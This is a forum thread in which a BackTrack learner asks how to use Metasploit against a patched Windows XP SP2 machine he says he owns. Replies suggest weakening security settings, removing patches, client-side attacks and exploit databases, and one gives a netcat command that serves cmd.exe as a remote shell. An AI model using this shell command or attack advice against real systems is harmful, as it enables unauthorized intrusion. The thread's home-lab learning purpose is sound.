Results 1 to 10 of 10

Thread: Need Help Finding Exploits for Windows XP SP2

  1. #1
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    9

    Default Need Help Finding Exploits for Windows XP SP2

    Hello, this is my first post on the Remote Exploit forums, but I have a moderate amount of experience with Linux and I have been learning about BackTrack for about a week now. I've learned quite a lot about decrypting WEP keys, and just how simple it is. After I realized just how insecure WEP is, I changed my network encryption to a 63-character WPA2 key with AES and TKIP. Since my wireless network is now mostly secure, I don't think I have to worry about anyone using my internet connection, but I would like to learn how to exploit a Windows Machine that I own. The system that I am trying to gain access to using metasploit is owned by me. I am doing this for educational purposes only, and I was wondering if you guys could help me learn how to gain access to the computer using metasploit. I have read a bit about how the exploits are done, but I haven't been able to figure out how to get MetaSploit to work. Here are some details about my configuration:

    * The (home) network I am on is owned by me. The access point is called "YNXA7". It is encrypted wirelessly using WPA2 and a 63-character key generated from GRC.

    * The computer I am attempting to run the exploit from is connected to the network wirelessly, and is given the IP address of 192.168.1.2 by DHCP.

    * The computer which I am testing for vulnerability to exploits is on the IP address of 192.168.1.3, and it is running Windows XP SP2. It has few programs installed except for the default software and McAfee Total Protection. All Windows Updates have been installed.

    * The name of the windows workgroup is "WORKGROUP", and because the machine is intended to be the target of the attack, I set it's network name to VICTIM.home

    After running nmap on the computer using nmap -sU 192.168.1.3, here is the output I get:

    Starting Nmap 4.60 ( hxxp:\\nmap.org ) at 2009-01-26 18:55 GMT
    Interesting ports on VICTIM.home (192.168.1.3):
    Not shown: 1482 closed ports
    PORT STATE SERVICE
    137/udp open|filtered netbios-ns
    138/udp open|filtered netbios-dgm
    445/udp open|filtered microsoft-ds
    500/udp open|filtered isakmp
    1900/udp open|filtered UPnP
    4500/udp open|filtered sae-urn
    MAC Address: 00:16:6F:68:A0:6E (Intel)

    Nmap done: 1 IP address (1 host up) scanned in 6.502 seconds

    I have MetaSploit 3 running on the computer that I have backtrack on at the default web address of hxxp:\\127.0.0.1:55555, and I have unsuccessfully tried a MSRPC exploit. Sorry for the weird URL formatting but I'm not allowed to post URLs yet.

    Could anyone help me figure out how it would be possible to exploit on this computer?

  2. #2
    Junior Member
    Join Date
    Oct 2008
    Posts
    37

    Default

    Metasploit doesn't have everything. Try going to milw0rm.com

  3. #3
    Member
    Join Date
    Jan 2010
    Location
    The new forums
    Posts
    462

    Default

    All Windows Updates have been installed.
    This is your problem. Try finding some vulnerable software exploits from Metasploit and add them to your XP machine (FTP, SMTP, IMAP, etc). Or you can try initiate client side attacks through email or IE.

  4. #4
    Senior Member SephStorm's Avatar
    Join Date
    Aug 2008
    Posts
    166

    Default

    I have had this issue as well. When you review targets under BackTrack. Most of the targets are 2k, XP SP1 machines. Being that it is not possible in my knowledge to downgrade from SP2 to 1, this makes testing difficult for me. in addition, I have never had success downloading updates to Bt, however that is be expected, as I have never succesfully installed a version of BT to a computer. (I was so close!)
    "You're only smoke and mirrors..."

  5. #5

    Default

    Quote Originally Posted by aliendude5300 View Post
    * The computer which I am testing for vulnerability to exploits is on the IP address of 192.168.1.3, and it is running Windows XP SP2. All Windows Updates have been installed.

    Could anyone help me figure out how it would be possible to exploit on this computer?
    Let me see if I understand this. You have a FULLY patched XP SP2 box and you want to exploit it using metasploit (i.e. publicly available exploits)?

    If it is FULLY patched, then generally speaking, no public exploits should work (there may be some that could work given some kind of specific set up). But in general, if it is fully patched, you either need some kind of misconfiguration or a 0-day exploit.

    You could change the group policy to allow "classic" network logins. That will open up the potential for some SMB type attacks. Go to Administrative Tools > Local Security Policy > Security Options and change "Network access: Sharing and security model for local accounts" from Guest Only to Classic.

    Now you can login remotely using one of the local accounts (such as administrator). You will also need to set an administrator password.

    Good Luck...

  6. #6
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Metasploit is nice to do a quick and dirty test but if you want to get into a machine often Metasploit automatic exploitation isn't working the way you want it to.

    The best would be to learn how exploits work, how to find them and how to write/modify exploits.

    As said before if the machine is fully patched you can most likely just do attacks which involve someone on the victim machine to open (email/website/playlist...).
    Tiocfaidh ár lá

  7. #7
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Quote Originally Posted by KMDave View Post
    Metasploit is nice to do a quick and dirty test but if you want to get into a machine often Metasploit automatic exploitation isn't working the way you want it to.

    The best would be to learn how exploits work, how to find them and how to write/modify exploits.

    As said before if the machine is fully patched you can most likely just do attacks which involve someone on the victim machine to open (email/website/playlist...).
    I agree. And an excellent playground when starting out learning how exploits work is PwnOS, which can be downloaded from http://forums.heorot.net/.
    -Monkeys are like nature's humans.

  8. #8
    Senior Member
    Join Date
    Feb 2010
    Posts
    146

    Default

    cat /pentest/exploits/milw0rm/sploitlist.txt | grep XP
    but as stated by others your problem probably lies in the fact that you have fully patched your machine, so if you have a fully isolated network than uninstall/remove the patches
    open source = open minds, human knowledge belongs to the world

  9. #9
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    As said before if the machine is fully patched you can most likely just do attacks which involve someone on the victim machine to open (email/website/playlist...).
    Search this forum for title with " Metasploiting for BT3 - Reverse TCP", select the first one by phoenix910. I would download the pdf file (link can be found inside the description).

    This tut is an excellent piece of work, a very helpful writing with friendly approach. And, it works perfectly........ i checked on BT3 platform. Works fine no matter victim is Vista/XP, firewall On/Off......:-)

  10. #10
    Junior Member
    Join Date
    Jan 2010
    Posts
    42

    Default

    Hi,

    If you are looking for practicing Metasploit, then as suggested by other members, you need to have some vulnerability on your XP SP2 machine.

    First thing which i don't understand at your part is why you did only UDP scanning of the target machine (-sU)? You should have scanned TCP as well.

    Anyways, for practicing Metasploit, lookout of netcat NT 1.10 version. It's vulnerable when you run it as follow:

    # nc.exe -v -L -p 8080 -e cmd.exe
    v: verbose
    L: listen harder i.e. even after disconnecting once it should get ready for listening again
    p: port to listen on
    e: program to execute

    with NT 1.10 version, -e is the vulnerable part. Metaploit has exploit for it.

    You may need to either shut your firewall or allow exception for port 8080 or you may go for reverse connect from XP SP2 to your attacking machine.

    From here onwards i can spoon feed you for both the scenarios, but better you look your own for these two conditions.

    Let us know if you stuck at any point, but we expect you to google 10 times before you ask here something.

    rgds
    fr0zen sm0ke

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •